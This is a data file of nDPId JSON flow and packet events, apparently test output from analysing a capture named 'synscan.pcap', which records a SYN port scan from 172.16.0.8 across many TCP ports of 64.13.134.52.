-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsHwsAAC8G+mesEAAIQA2GNIzTAnzdU4MZAAAAAGACEAAmEAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAs0XAAACYGUQKsEAAIQA2GNIzTBFPdU4MZAAAAAGACDAAoOQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsKaQAACUG+c6sEAAIQA2GNIzSIL\/dUoMYAAAAAGACCAAP0AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsRwIAACoG13CsEAAIQA2GNIzSAiDdUoMYAAAAAGACDAAqbwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsl50AAC8GgdWsEAAIQA2GNIzSI5fdUoMYAAAAAGACEAAE+AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsPJwAACgG49asEAAIQA2GNIzSAbzdUoMYAAAAAGACBAAy0wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsm34AACcGhfSsEAAIQA2GNIzSDIvdUoMYAAAAAGACEAAcBAAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsyRcAACcGWFusEAAIQA2GNIzSTv3dUoMYAAAAAGACEADZkQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsPAAAADYG1nKsEAAIQA2GNIzSGgvdUoMYAAAAAGACDAAShAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAscNkAACkGrpmsEAAIQA2GNIzSG7\/dUoMYAAAAAGACCAAU0AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsWzsAACgGxTesEAAIQA2GNIzSB9rdUoMYAAAAAGACBAAstQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAseaYAADcGl8ysEAAIQA2GNIzSeOfdUoMYAAAAAGACEACvpwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAstGYAACYGbgysEAAIQA2GNIzSBEHdUoMYAAAAAGACDAAoTgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060968,"flow_last_seen":1278275060968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060968,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_packet_id":1,"flow_last_seen":1278275060968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060968,"pkt":"ACYLMQczACWzv5HuCABFAAAs5AYAADgGLGysEAAIQA2GNIzSC17dUoMYAAAAAGACBAApMQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060969,"flow_last_seen":1278275060969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060969,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_packet_id":1,"flow_last_seen":1278275060969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060969,"pkt":"ACYLMQczACWzv5HuCABFAAAsD\/oAACUGE3msEAAIQA2GNIzSFO3dUoMYAAAAAGACCAAbogAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsEeMAADAGBpCsEAAIQA2GNIzTAgPdU4MZAAAAAGACBAAyiQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsPmQAACcG4w6sEAAIQA2GNIzTCk7dU4MZAAAAAGACEAAePgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAs2NYAACkGRpysEAAIQA2GNIzTFa7dU4MZAAAAAGACCAAa3gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsj\/QAADMGhX6sEAAIQA2GNIzSGvXdUoMYAAAAAGACEAANmgAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsDT8AACsGEDSsEAAIQA2GNIzSZIfdUoMYAAAAAGACEADEBwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsrMsAADQGZ6esEAAIQA2GNIzSGzndUoMYAAAAAGACBAAZVgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsXC4AACkGw0SsEAAIQA2GNIzSC7vdUoMYAAAAAGACCAAk1AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsTDIAADEGy0CsEAAIQA2GNIzSC8PdUoMYAAAAAGACCAAkzAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsR\/MAADsGxX+sEAAIQA2GNIzSw1LdUoMYAAAAAGACEABlPAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAskHEAACwGjAGsEAAIQA2GNIzSJw7dUoMYAAAAAGACBAANgQAAAgQFtA=="} 
